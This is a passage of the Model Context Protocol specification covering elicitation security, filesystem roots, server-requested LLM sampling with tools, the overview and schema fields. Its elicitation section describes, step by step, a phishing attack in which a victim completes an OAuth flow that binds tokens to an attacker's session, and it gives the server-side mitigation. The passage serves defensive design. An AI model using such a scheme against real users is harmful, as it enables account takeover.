For example, on iOS, [SFSafariViewController](https://developer.apple.com/documentation/safariservices/sfsafariviewcontroller) is good, but [WkWebView](https://developer.apple.com/documentation/webkit/wkwebview) is not.
5. **SHOULD** highlight the domain of the URL to mitigate subdomain spoofing.
6. **SHOULD** have warnings for ambiguous/suspicious URIs (i.e., containing Punycode).
7. **SHOULD NOT** render URLs as clickable in any field of an elicitation request, except for the `url` field in a URL elicitation request (with the restrictions detailed above).
### Identifying the User
Servers **MUST NOT** rely on client-provided user identification without server verification, as this can be forged.
Instead, servers **SHOULD** follow [security best practices](../basic/security_best_practices).
Non-normative examples:
* Incorrect: Treat user input like "I am [joe@example.com](mailto:joe@example.com)" as authoritative
* Correct: Rely on [authorization](../basic/authorization) to identify the user
### Form Mode Security
1. Servers **MUST NOT** request sensitive information (passwords, API keys, etc.) via form mode
2. Clients **SHOULD** validate all responses against the provided schema
3. Servers **SHOULD** validate received data matches the requested schema
#### Phishing
URL mode elicitation returns a URL that an attacker can use to send to a victim. The MCP Server **MUST** verify the identity of the user who opens the URL before accepting information.
Typically identity verification is done by leveraging the [MCP authorization server](../basic/authorization) to identify the user, through a session cookie or equivalent in the browser.
For example, URL mode elicitation may be used to perform OAuth flows where the server acts as an OAuth client of another resource server. Without proper mitigation, the following phishing attack is possible:
1. A malicious user (Alice) connected to a benign server triggers an elicitation request
2. The benign server generates an authorization URL, acting as an OAuth client of a third-party authorization server
3. Alice's client displays the URL and asks for consent
4. Instead of clicking on the link, Alice tricks a victim user (Bob) of the same benign server into clicking it
5. Bob opens the link and completes the authorization, thinking they are authorizing their own connection to the benign server
6. The benign server receives a callback/redirect form the third-party authorization server, and assumes it's Alice's request
7. The tokens for the third-party server are bound to Alice's session and identity, instead of Bob's, resulting in an account takeover
To prevent this attack, the server **MUST** ensure that the user who started the elicitation request (the end-user who is accessing the server via the MCP client) is the same user who completes the authorization flow.
There are many ways to achieve this and the best way will depend on the specific implementation.
As a common, non-normative example, consider a case where the MCP server is accessible via the web and desires to perform a third-party authorization code flow.
To prevent the phishing attack, the server would create a URL mode elicitation to `https://mcp.example.com/connect?elicitationId=...` rather than the third-party authorization endpoint.
This "connect URL" must ensure the user who opened the page is the same user who the elicitation was generated for.
It would, for example, check that the user has a valid session cookie and that the session cookie is for the same user who was using the MCP client to generate the URL mode elicitation.
This could be done by comparing the authoritative subject (`sub` claim) from the MCP server's authorization server to the subject from the session cookie.
Once that page ensures the same user, it can send the user to the third-party authorization server at `https://example.com/authorize?...` where a normal OAuth flow can be completed.
In other cases, the server may not be accessible via the web and may not be able to use a session cookie to identify the user.
In this case, the server must use a different mechanism to identify the user who opens the elicitation URL is the same user who the elicitation was generated for.
In all implementations, the server **MUST** ensure that the mechanism to determine the user's identity is resilient to attacks where an attacker can modify the elicitation URL.
# Roots
Source: https://modelcontextprotocol.io/specification/2025-11-25/client/roots
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) provides a standardized way for clients to expose
filesystem "roots" to servers. Roots define the boundaries of where servers can operate
within the filesystem, allowing them to understand which directories and files they have
access to. Servers can request the list of roots from supporting clients and receive
notifications when that list changes.
## User Interaction Model
Roots in MCP are typically exposed through workspace or project configuration interfaces.
For example, implementations could offer a workspace/project picker that allows users to
select directories and files the server should have access to. This can be combined with
automatic workspace detection from version control systems or project files.
However, implementations are free to expose roots through any interface pattern that
suits their needs—the protocol itself does not mandate any specific user
interaction model.
## Capabilities
Clients that support roots **MUST** declare the `roots` capability during
[initialization](/specification/2025-11-25/basic/lifecycle#initialization):
```json theme={null}
{
"capabilities": {
"roots": {
"listChanged": true
}
}
}
```
`listChanged` indicates whether the client will emit notifications when the list of roots
changes.
## Protocol Messages
### Listing Roots
To retrieve roots, servers send a `roots/list` request:
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "roots/list"
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"roots": [
{
"uri": "file:///home/user/projects/myproject",
"name": "My Project"
}
]
}
}
```
### Root List Changes
When roots change, clients that support `listChanged` **MUST** send a notification:
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/roots/list_changed"
}
```
## Message Flow
```mermaid theme={null}
sequenceDiagram
participant Server
participant Client
Note over Server,Client: Discovery
Server->>Client: roots/list
Client-->>Server: Available roots
Note over Server,Client: Changes
Client--)Server: notifications/roots/list_changed
Server->>Client: roots/list
Client-->>Server: Updated roots
```
## Data Types
### Root
A root definition includes:
* `uri`: Unique identifier for the root. This **MUST** be a `file://` URI in the current
specification.
* `name`: Optional human-readable name for display purposes.
Example roots for different use cases:
#### Project Directory
```json theme={null}
{
"uri": "file:///home/user/projects/myproject",
"name": "My Project"
}
```
#### Multiple Repositories
```json theme={null}
[
{
"uri": "file:///home/user/repos/frontend",
"name": "Frontend Repository"
},
{
"uri": "file:///home/user/repos/backend",
"name": "Backend Repository"
}
]
```
## Error Handling
Clients **SHOULD** return standard JSON-RPC errors for common failure cases:
* Client does not support roots: `-32601` (Method not found)
* Internal errors: `-32603`
Example error:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"error": {
"code": -32601,
"message": "Roots not supported",
"data": {
"reason": "Client does not have roots capability"
}
}
}
```
## Security Considerations
1. Clients **MUST**:
* Only expose roots with appropriate permissions
* Validate all root URIs to prevent path traversal
* Implement proper access controls
* Monitor root accessibility
2. Servers **SHOULD**:
* Handle cases where roots become unavailable
* Respect root boundaries during operations
* Validate all paths against provided roots
## Implementation Guidelines
1. Clients **SHOULD**:
* Prompt users for consent before exposing roots to servers
* Provide clear user interfaces for root management
* Validate root accessibility before exposing
* Monitor for root changes
2. Servers **SHOULD**:
* Check for roots capability before usage
* Handle root list changes gracefully
* Respect root boundaries in operations
* Cache root information appropriately
# Sampling
Source: https://modelcontextprotocol.io/specification/2025-11-25/client/sampling
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) provides a standardized way for servers to request LLM
sampling ("completions" or "generations") from language models via clients. This flow
allows clients to maintain control over model access, selection, and permissions while
enabling servers to leverage AI capabilities—with no server API keys necessary.
Servers can request text, audio, or image-based interactions and optionally include
context from MCP servers in their prompts.
## User Interaction Model
Sampling in MCP allows servers to implement agentic behaviors, by enabling LLM calls to
occur *nested* inside other MCP server features.
Implementations are free to expose sampling through any interface pattern that suits
their needs—the protocol itself does not mandate any specific user interaction
model.
For trust & safety and security, there **SHOULD** always
be a human in the loop with the ability to deny sampling requests.
Applications **SHOULD**:
* Provide UI that makes it easy and intuitive to review sampling requests
* Allow users to view and edit prompts before sending
* Present generated responses for review before delivery
## Tools in Sampling
Servers can request that the client's LLM use tools during sampling by providing a `tools` array and optional `toolChoice` configuration in their sampling requests. This enables servers to implement agentic behaviors where the LLM can call tools, receive results, and continue the conversation - all within a single sampling request flow.
Clients **MUST** declare support for tool use via the `sampling.tools` capability to receive tool-enabled sampling requests. Servers **MUST NOT** send tool-enabled sampling requests to Clients that have not declared support for tool use via the `sampling.tools` capability.
## Capabilities
Clients that support sampling **MUST** declare the `sampling` capability during
[initialization](/specification/2025-11-25/basic/lifecycle#initialization):
**Basic sampling:**
```json theme={null}
{
"capabilities": {
"sampling": {}
}
}
```
**With tool use support:**
```json theme={null}
{
"capabilities": {
"sampling": {
"tools": {}
}
}
}
```
**With context inclusion support (soft-deprecated):**
```json theme={null}
{
"capabilities": {
"sampling": {
"context": {}
}
}
}
```
The `includeContext` parameter values `"thisServer"` and `"allServers"` are
soft-deprecated. Servers **SHOULD** avoid using these values (e.g. can just
omit `includeContext` since it defaults to `"none"`), and **SHOULD NOT** use
them unless the client declares `sampling.context` capability. These values
may be removed in future spec releases.
## Protocol Messages
### Creating Messages
To request a language model generation, servers send a `sampling/createMessage` request:
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "sampling/createMessage",
"params": {
"messages": [
{
"role": "user",
"content": {
"type": "text",
"text": "What is the capital of France?"
}
}
],
"modelPreferences": {
"hints": [
{
"name": "claude-3-sonnet"
}
],
"intelligencePriority": 0.8,
"speedPriority": 0.5
},
"systemPrompt": "You are a helpful assistant.",
"maxTokens": 100
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"role": "assistant",
"content": {
"type": "text",
"text": "The capital of France is Paris."
},
"model": "claude-3-sonnet-20240307",
"stopReason": "endTurn"
}
}
```
### Sampling with Tools
The following diagram illustrates the complete flow of sampling with tools, including the multi-turn tool loop:
```mermaid theme={null}
sequenceDiagram
participant Server
participant Client
participant User
participant LLM
Note over Server,Client: Initial request with tools
Server->>Client: sampling/createMessage (messages + tools)
Note over Client,User: Human-in-the-loop review
Client->>User: Present request for approval
User-->>Client: Approve/modify
Client->>LLM: Forward request with tools
LLM-->>Client: Response with tool_use (stopReason: "toolUse")
Client->>User: Present tool calls for review
User-->>Client: Approve tool calls
Client-->>Server: Return tool_use response
Note over Server: Execute tool(s)
Server->>Server: Run get_weather("Paris") Run get_weather("London")
Note over Server,Client: Continue with tool results
Server->>Client: sampling/createMessage (history + tool_results + tools)
Client->>User: Present continuation
User-->>Client: Approve
Client->>LLM: Forward with tool results
LLM-->>Client: Final text response (stopReason: "endTurn")
Client->>User: Present response
User-->>Client: Approve
Client-->>Server: Return final response
Note over Server: Server processes result (may continue conversation...)
```
To request LLM generation with tool use capabilities, servers include `tools` and optionally `toolChoice` in the request:
**Request (Server -> Client):**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "sampling/createMessage",
"params": {
"messages": [
{
"role": "user",
"content": {
"type": "text",
"text": "What's the weather like in Paris and London?"
}
}
],
"tools": [
{
"name": "get_weather",
"description": "Get current weather for a city",
"inputSchema": {
"type": "object",
"properties": {
"city": {
"type": "string",
"description": "City name"
}
},
"required": ["city"]
}
}
],
"toolChoice": {
"mode": "auto"
},
"maxTokens": 1000
}
}
```
**Response (Client -> Server):**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"role": "assistant",
"content": [
{
"type": "tool_use",
"id": "call_abc123",
"name": "get_weather",
"input": {
"city": "Paris"
}
},
{
"type": "tool_use",
"id": "call_def456",
"name": "get_weather",
"input": {
"city": "London"
}
}
],
"model": "claude-3-sonnet-20240307",
"stopReason": "toolUse"
}
}
```
### Multi-turn Tool Loop
After receiving tool use requests from the LLM, the server typically:
1. Executes the requested tool uses.
2. Sends a new sampling request with the tool results appended
3. Receives the LLM's response (which might contain new tool uses)
4. Repeats as many times as needed (server might cap the maximum number of iterations, and e.g. pass `toolChoice: {mode: "none"}` on the last iteration to force a final result)
**Follow-up request (Server -> Client) with tool results:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"method": "sampling/createMessage",
"params": {
"messages": [
{
"role": "user",
"content": {
"type": "text",
"text": "What's the weather like in Paris and London?"
}
},
{
"role": "assistant",
"content": [
{
"type": "tool_use",
"id": "call_abc123",
"name": "get_weather",
"input": { "city": "Paris" }
},
{
"type": "tool_use",
"id": "call_def456",
"name": "get_weather",
"input": { "city": "London" }
}
]
},
{
"role": "user",
"content": [
{
"type": "tool_result",
"toolUseId": "call_abc123",
"content": [
{
"type": "text",
"text": "Weather in Paris: 18°C, partly cloudy"
}
]
},
{
"type": "tool_result",
"toolUseId": "call_def456",
"content": [
{
"type": "text",
"text": "Weather in London: 15°C, rainy"
}
]
}
]
}
],
"tools": [
{
"name": "get_weather",
"description": "Get current weather for a city",
"inputSchema": {
"type": "object",
"properties": {
"city": { "type": "string" }
},
"required": ["city"]
}
}
],
"maxTokens": 1000
}
}
```
**Final response (Client -> Server):**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"result": {
"role": "assistant",
"content": {
"type": "text",
"text": "Based on the current weather data:\n\n- **Paris**: 18°C and partly cloudy - quite pleasant!\n- **London**: 15°C and rainy - you'll want an umbrella.\n\nParis has slightly warmer and drier conditions today."
},
"model": "claude-3-sonnet-20240307",
"stopReason": "endTurn"
}
}
```
## Message Content Constraints
### Tool Result Messages
When a user message contains tool results (type: "tool\_result"), it **MUST** contain ONLY tool results. Mixing tool results with other content types (text, image, audio) in the same message is not allowed.
This constraint ensures compatibility with provider APIs that use dedicated roles for tool results (e.g., OpenAI's "tool" role, Gemini's "function" role).
**Valid - single tool result:**
```json theme={null}
{
"role": "user",
"content": {
"type": "tool_result",
"toolUseId": "call_123",
"content": [{ "type": "text", "text": "Result data" }]
}
}
```
**Valid - multiple tool results:**
```json theme={null}
{
"role": "user",
"content": [
{
"type": "tool_result",
"toolUseId": "call_123",
"content": [{ "type": "text", "text": "Result 1" }]
},
{
"type": "tool_result",
"toolUseId": "call_456",
"content": [{ "type": "text", "text": "Result 2" }]
}
]
}
```
**Invalid - mixed content:**
```json theme={null}
{
"role": "user",
"content": [
{
"type": "text",
"text": "Here are the results:"
},
{
"type": "tool_result",
"toolUseId": "call_123",
"content": [{ "type": "text", "text": "Result data" }]
}
]
}
```
### Tool Use and Result Balance
When using tool use in sampling, every assistant message containing `ToolUseContent` blocks **MUST** be followed by a user message that consists entirely of `ToolResultContent` blocks, with each tool use (e.g. with `id: $id`) matched by a corresponding tool result (with `toolUseId: $id`), before any other message.
This requirement ensures:
* Tool uses are always resolved before the conversation continues
* Provider APIs can concurrently process multiple tool uses and fetch their results in parallel
* The conversation maintains a consistent request-response pattern
**Example valid sequence:**
1. User message: "What's the weather like in Paris and London?"
2. Assistant message: `ToolUseContent` (`id: "call_abc123", name: "get_weather", input: {city: "Paris"}`) + `ToolUseContent` (`id: "call_def456", name: "get_weather", input: {city: "London"}`)
3. User message: `ToolResultContent` (`toolUseId: "call_abc123", content: "18°C, partly cloudy"`) + `ToolResultContent` (`toolUseId: "call_def456", content: "15°C, rainy"`)
4. Assistant message: Text response comparing the weather in both cities
**Invalid sequence - missing tool result:**
1. User message: "What's the weather like in Paris and London?"
2. Assistant message: `ToolUseContent` (`id: "call_abc123", name: "get_weather", input: {city: "Paris"}`) + `ToolUseContent` (`id: "call_def456", name: "get_weather", input: {city: "London"}`)
3. User message: `ToolResultContent` (`toolUseId: "call_abc123", content: "18°C, partly cloudy"`) ← Missing result for call\_def456
4. Assistant message: Text response (invalid - not all tool uses were resolved)
## Cross-API Compatibility
The sampling specification is designed to work across multiple LLM provider APIs (Claude, OpenAI, Gemini, etc.). Key design decisions for compatibility:
### Message Roles
MCP uses two roles: "user" and "assistant".
Tool use requests are sent in CreateMessageResult with the "assistant" role.
Tool results are sent back in messages with the "user" role.
Messages with tool results cannot contain other kinds of content.
### Tool Choice Modes
`CreateMessageRequest.params.toolChoice` controls the tool use ability of the model:
* `{mode: "auto"}`: Model decides whether to use tools (default)
* `{mode: "required"}`: Model MUST use at least one tool before completing
* `{mode: "none"}`: Model MUST NOT use any tools
### Parallel Tool Use
MCP allows models to make multiple tool use requests in parallel (returning an array of `ToolUseContent`). All major provider APIs support this:
* **Claude**: Supports parallel tool use natively
* **OpenAI**: Supports parallel tool calls (can be disabled with `parallel_tool_calls: false`)
* **Gemini**: Supports parallel function calls natively
Implementations wrapping providers that support disabling parallel tool use MAY expose this as an extension, but it is not part of the core MCP specification.
## Message Flow
```mermaid theme={null}
sequenceDiagram
participant Server
participant Client
participant User
participant LLM
Note over Server,Client: Server initiates sampling
Server->>Client: sampling/createMessage
Note over Client,User: Human-in-the-loop review
Client->>User: Present request for approval
User-->>Client: Review and approve/modify
Note over Client,LLM: Model interaction
Client->>LLM: Forward approved request
LLM-->>Client: Return generation
Note over Client,User: Response review
Client->>User: Present response for approval
User-->>Client: Review and approve/modify
Note over Server,Client: Complete request
Client-->>Server: Return approved response
```
## Data Types
### Messages
Sampling messages can contain:
#### Text Content
```json theme={null}
{
"type": "text",
"text": "The message content"
}
```
#### Image Content
```json theme={null}
{
"type": "image",
"data": "base64-encoded-image-data",
"mimeType": "image/jpeg"
}
```
#### Audio Content
```json theme={null}
{
"type": "audio",
"data": "base64-encoded-audio-data",
"mimeType": "audio/wav"
}
```
### Model Preferences
Model selection in MCP requires careful abstraction since servers and clients may use
different AI providers with distinct model offerings. A server cannot simply request a
specific model by name since the client may not have access to that exact model or may
prefer to use a different provider's equivalent model.
To solve this, MCP implements a preference system that combines abstract capability
priorities with optional model hints:
#### Capability Priorities
Servers express their needs through three normalized priority values (0-1):
* `costPriority`: How important is minimizing costs? Higher values prefer cheaper models.
* `speedPriority`: How important is low latency? Higher values prefer faster models.
* `intelligencePriority`: How important are advanced capabilities? Higher values prefer
more capable models.
#### Model Hints
While priorities help select models based on characteristics, `hints` allow servers to
suggest specific models or model families:
* Hints are treated as substrings that can match model names flexibly
* Multiple hints are evaluated in order of preference
* Clients **MAY** map hints to equivalent models from different providers
* Hints are advisory—clients make final model selection
For example:
```json theme={null}
{
"hints": [
{ "name": "claude-3-sonnet" }, // Prefer Sonnet-class models
{ "name": "claude" } // Fall back to any Claude model
],
"costPriority": 0.3, // Cost is less important
"speedPriority": 0.8, // Speed is very important
"intelligencePriority": 0.5 // Moderate capability needs
}
```
The client processes these preferences to select an appropriate model from its available
options. For instance, if the client doesn't have access to Claude models but has Gemini,
it might map the sonnet hint to `gemini-1.5-pro` based on similar capabilities.
## Error Handling
Clients **SHOULD** return errors for common failure cases:
* User rejected sampling request: `-1`
* Tool result missing in request: `-32602` (Invalid params)
* Tool results mixed with other content: `-32602` (Invalid params)
Example errors:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"error": {
"code": -1,
"message": "User rejected sampling request"
}
}
```
```json theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"error": {
"code": -32602,
"message": "Tool result missing in request"
}
}
```
## Security Considerations
1. Clients **SHOULD** implement user approval controls
2. Both parties **SHOULD** validate message content
3. Clients **SHOULD** respect model preference hints
4. Clients **SHOULD** implement rate limiting
5. Both parties **MUST** handle sensitive data appropriately
When tools are used in sampling, additional security considerations apply:
6. Servers **MUST** ensure that when replying to a `stopReason: "toolUse"`, each `ToolUseContent` item is responded to with a `ToolResultContent` item with a matching `toolUseId`, and that the user message contains only tool results (no other content types)
7. Both parties **SHOULD** implement iteration limits for tool loops
# Specification
Source: https://modelcontextprotocol.io/specification/2025-11-25/index
[Model Context Protocol](https://modelcontextprotocol.io) (MCP) is an open protocol that
enables seamless integration between LLM applications and external data sources and
tools. Whether you're building an AI-powered IDE, enhancing a chat interface, or creating
custom AI workflows, MCP provides a standardized way to connect LLMs with the context
they need.
This specification defines the authoritative protocol requirements, based on the
TypeScript schema in
[schema.ts](https://github.com/modelcontextprotocol/specification/blob/main/schema/2025-11-25/schema.ts).
For implementation guides and examples, visit
[modelcontextprotocol.io](https://modelcontextprotocol.io).
The key words "MUST", "MUST NOT", "REQUIRED", "SHALL", "SHALL NOT", "SHOULD", "SHOULD
NOT", "RECOMMENDED", "NOT RECOMMENDED", "MAY", and "OPTIONAL" in this document are to be
interpreted as described in [BCP 14](https://datatracker.ietf.org/doc/html/bcp14)
\[[RFC2119](https://datatracker.ietf.org/doc/html/rfc2119)]
\[[RFC8174](https://datatracker.ietf.org/doc/html/rfc8174)] when, and only when, they
appear in all capitals, as shown here.
## Overview
MCP provides a standardized way for applications to:
* Share contextual information with language models
* Expose tools and capabilities to AI systems
* Build composable integrations and workflows
The protocol uses [JSON-RPC](https://www.jsonrpc.org/) 2.0 messages to establish
communication between:
* **Hosts**: LLM applications that initiate connections
* **Clients**: Connectors within the host application
* **Servers**: Services that provide context and capabilities
MCP takes some inspiration from the
[Language Server Protocol](https://microsoft.github.io/language-server-protocol/), which
standardizes how to add support for programming languages across a whole ecosystem of
development tools. In a similar way, MCP standardizes how to integrate additional context
and tools into the ecosystem of AI applications.
## Key Details
### Base Protocol
* [JSON-RPC](https://www.jsonrpc.org/) message format
* Stateful connections
* Server and client capability negotiation
### Features
Servers offer any of the following features to clients:
* **Resources**: Context and data, for the user or the AI model to use
* **Prompts**: Templated messages and workflows for users
* **Tools**: Functions for the AI model to execute
Clients may offer the following features to servers:
* **Sampling**: Server-initiated agentic behaviors and recursive LLM interactions
* **Roots**: Server-initiated inquiries into URI or filesystem boundaries to operate in
* **Elicitation**: Server-initiated requests for additional information from users
### Additional Utilities
* Configuration
* Progress tracking
* Cancellation
* Error reporting
* Logging
## Security and Trust & Safety
The Model Context Protocol enables powerful capabilities through arbitrary data access
and code execution paths. With this power comes important security and trust
considerations that all implementors must carefully address.
### Key Principles
1. **User Consent and Control**
* Users must explicitly consent to and understand all data access and operations
* Users must retain control over what data is shared and what actions are taken
* Implementors should provide clear UIs for reviewing and authorizing activities
2. **Data Privacy**
* Hosts must obtain explicit user consent before exposing user data to servers
* Hosts must not transmit resource data elsewhere without user consent
* User data should be protected with appropriate access controls
3. **Tool Safety**
* Tools represent arbitrary code execution and must be treated with appropriate
caution.
* In particular, descriptions of tool behavior such as annotations should be
considered untrusted, unless obtained from a trusted server.
* Hosts must obtain explicit user consent before invoking any tool
* Users should understand what each tool does before authorizing its use
4. **LLM Sampling Controls**
* Users must explicitly approve any LLM sampling requests
* Users should control:
* Whether sampling occurs at all
* The actual prompt that will be sent
* What results the server can see
* The protocol intentionally limits server visibility into prompts
### Implementation Guidelines
While MCP itself cannot enforce these security principles at the protocol level,
implementors **SHOULD**:
1. Build robust consent and authorization flows into their applications
2. Provide clear documentation of security implications
3. Implement appropriate access controls and data protections
4. Follow security best practices in their integrations
5. Consider privacy implications in their feature designs
## Learn More
Explore the detailed specification for each protocol component:
# Schema Reference
Source: https://modelcontextprotocol.io/specification/2025-11-25/schema
## JSON-RPC
Optional annotations for the client. The client can use annotations to inform how objects are used or displayed
audience?: Role\[]
Describes who the intended audience of this object or data is.
It can include multiple entries to indicate content useful for multiple audiences (e.g., \["user", "assistant"]).
priority?: number
Describes how important this data is for operating the server.
A value of 1 means "most important," and indicates that the data is
effectively required, while 0 means "least important," and indicates that
the data is entirely optional.
lastModified?: string
The moment the resource was last modified, as an ISO 8601 formatted string.
Should be an ISO 8601 formatted string (e.g., "2025-01-12T15:00:58Z").
Examples: last activity timestamp in an open file, timestamp when the resource
was attached, etc.
### `Cursor`
Cursor:string
An opaque token used to represent a cursor for pagination.
An optionally-sized icon that can be displayed in a user interface.
src: string
A standard URI pointing to an icon resource. May be an HTTP/HTTPS URL or a data: URI with Base64-encoded image data.
Consumers SHOULD takes steps to ensure URLs serving icons are from the
same domain as the client/server or a trusted domain.
Consumers SHOULD take appropriate precautions when consuming SVGs as they can contain
executable JavaScript.
mimeType?: string
Optional MIME type override if the source MIME type is missing or generic.
For example: "image/png", "image/jpeg", or "image/svg+xml".
sizes?: string\[]
Optional array of strings that specify sizes at which the icon can be used.
Each string should be in WxH format (e.g., "48x48", "96x96") or "any" for scalable formats like SVG.
If not provided, the client should assume that the icon can be used at any size.
theme?: "light" | "dark"
Optional specifier for the theme this icon is designed for. light indicates
the icon is designed to be used with a light background, and dark indicates
the icon is designed to be used with a dark background.
If not provided, the client should assume the icon can be used with any theme.
Intended for programmatic or logical use, but used as a display name in past specs or fallback (if title isn't present).
title?: string
Intended for UI and end-user contexts — optimized to be human-readable and easily understood,
even by those unfamiliar with domain-specific terminology.
If not provided, the name should be used for display (except for Tool,
where annotations.title should be given precedence over using name,
if present).
uri: string
The URI of this resource.
description?: string
A description of what this resource represents.
This can be used by clients to improve the LLM's understanding of available resources. It can be thought of like a "hint" to the model.
mimeType?: string
The MIME type of this resource, if known.
annotations?: Annotations
Optional annotations for the client.
size?: number
The size of the raw resource content, in bytes (i.e., before base64 encoding or any tokenization), if known.
This can be used by Hosts to display file sizes and estimate context window usage.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
ref: PromptReference | ResourceTemplateReference
argument: \{ name: string; value: string }
The argument's information
Type Declaration
name: string
The name of the argument
value: string
The value of the argument to use for completion matching.
Intended for programmatic or logical use, but used as a display name in past specs or fallback (if title isn't present).
title?: string
Intended for UI and end-user contexts — optimized to be human-readable and easily understood,
even by those unfamiliar with domain-specific terminology.
If not provided, the name should be used for display (except for Tool,
where annotations.title should be given precedence over using name,
if present).
The submitted form data, only present when action is "accept" and mode was "form".
Contains values matching the requested schema.
Omitted for out-of-band mode responses.
The parameters for a request to elicit non-sensitive information from the user via a form in the client.
task?: TaskMetadata
If specified, the caller is requesting task-augmented execution for this request.
The request will return a CreateTaskResult immediately, and the actual result can be
retrieved later via tasks/result.
Task augmentation is subject to capability negotiation - receivers MUST declare support
for task augmentation of specific request types in their capabilities.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
mode?: "form"
The elicitation mode.
message: string
The message to present to the user describing what information is being requested.
The parameters for a request to elicit information from the user via a URL in the client.
task?: TaskMetadata
If specified, the caller is requesting task-augmented execution for this request.
The request will return a CreateTaskResult immediately, and the actual result can be
retrieved later via tasks/result.
Task augmentation is subject to capability negotiation - receivers MUST declare support
for task augmentation of specific request types in their capabilities.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
mode: "url"
The elicitation mode.
message: string
The message to present to the user explaining why the interaction is needed.
elicitationId: string
The ID of the elicitation, which must be unique within the context of the server.
The client MUST treat this ID as an opaque value.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
protocolVersion: string
The latest version of the Model Context Protocol that the client supports. The client MAY decide to support older versions as well.
The version of the Model Context Protocol that the server wants to use. This may not match the version that the client requested. If the client cannot support this version, it MUST disconnect.
capabilities: ServerCapabilities
serverInfo: Implementation
instructions?: string
Instructions describing how to use the server and its features.
This can be used by clients to improve the LLM's understanding of available tools, resources, etc. It can be thought of like a "hint" to the model. For example, this information MAY be added to the system prompt.
Capabilities a client may support. Known capabilities are defined here, in this schema, but this is not a closed set: any client can define its own, additional capabilities.
experimental?: \{ \[key: string]: object }
Experimental, non-standard capabilities that the client supports.
roots?: \{ listChanged?: boolean }
Present if the client supports listing roots.
Type Declaration
OptionallistChanged?: boolean
Whether the client supports notifications for changes to the roots list.
sampling?: \{ context?: object; tools?: object }
Present if the client supports sampling from an LLM.
Type Declaration
Optionalcontext?: object
Whether the client supports context inclusion via includeContext parameter.
If not declared, servers SHOULD only use includeContext: "none" (or omit it).
Optionaltools?: object
Whether the client supports tool use via tools and toolChoice parameters.
elicitation?: \{ form?: object; url?: object }
Present if the client supports elicitation from the server.
Intended for programmatic or logical use, but used as a display name in past specs or fallback (if title isn't present).
title?: string
Intended for UI and end-user contexts — optimized to be human-readable and easily understood,
even by those unfamiliar with domain-specific terminology.
If not provided, the name should be used for display (except for Tool,
where annotations.title should be given precedence over using name,
if present).
version: string
description?: string
An optional human-readable description of what this implementation does.
This can be used by clients or servers to provide context about their purpose
and capabilities. For example, a server might describe the types of resources
or tools it provides, while a client might describe its intended use case.
websiteUrl?: string
An optional URL of the website for this implementation.
Capabilities that a server may support. Known capabilities are defined here, in this schema, but this is not a closed set: any server can define its own, additional capabilities.
experimental?: \{ \[key: string]: object }
Experimental, non-standard capabilities that the server supports.
logging?: object
Present if the server supports sending log messages to the client.
completions?: object
Present if the server supports argument autocompletion suggestions.
prompts?: \{ listChanged?: boolean }
Present if the server offers any prompt templates.
Type Declaration
OptionallistChanged?: boolean
Whether this server supports notifications for changes to the prompt list.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
level: LoggingLevel
The level of logging that the client wants to receive from the server. The server should send all logs at this level and higher (i.e., more severe) to the client as notifications/message.
This notification can be sent by either side to indicate that it is cancelling a previously-issued request.
The request SHOULD still be in-flight, but due to communication latency, it is always possible that this notification MAY arrive after the request has already finished.
This notification indicates that the result will be unused, so any associated processing SHOULD cease.
A client MUST NOT attempt to cancel its initialize request.
For task cancellation, use the tasks/cancel request instead of this notification.
This MUST correspond to the ID of a request previously issued in the same direction.
This MUST be provided for cancelling non-task requests.
This MUST NOT be used for cancelling tasks (use the tasks/cancel request instead).
reason?: string
An optional string describing the reason for the cancellation. This MAY be logged or presented to the user.
An optional notification from the receiver to the requestor, informing them that a task's status has changed. Receivers are not required to send these notifications.
JSONRPCNotification of a log message passed from server to client. If no logging/setLevel request has been sent from the client, the server MAY decide which messages to send automatically.
An optional notification from the server to the client, informing it that the list of prompts it offers has changed. This may be issued by servers without any previous subscription from the client.
An optional notification from the server to the client, informing it that the list of resources it can read from has changed. This may be issued by servers without any previous subscription from the client.
A notification from the server to the client, informing it that a resource has changed and may need to be read again. This should only be sent if the client previously sent a resources/subscribe request.
A notification from the client to the server, informing it that the list of roots has changed.
This notification should be sent whenever the client adds, removes, or modifies any root.
The server should then request an updated list of roots using the ListRootsRequest.
An optional notification from the server to the client, informing it that the list of tools it offers has changed. This may be issued by servers without any previous subscription from the client.
A ping, issued by either the server or the client, to check that the other party is still alive. The receiver must promptly respond, or else may be disconnected.
The response to a tasks/result request.
The structure matches the result type of the original request.
For example, a tools/call task would return the CallToolResult structure.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
Intended for programmatic or logical use, but used as a display name in past specs or fallback (if title isn't present).
title?: string
Intended for UI and end-user contexts — optimized to be human-readable and easily understood,
even by those unfamiliar with domain-specific terminology.
If not provided, the name should be used for display (except for Tool,
where annotations.title should be given precedence over using name,
if present).
description?: string
An optional description of what this prompt provides
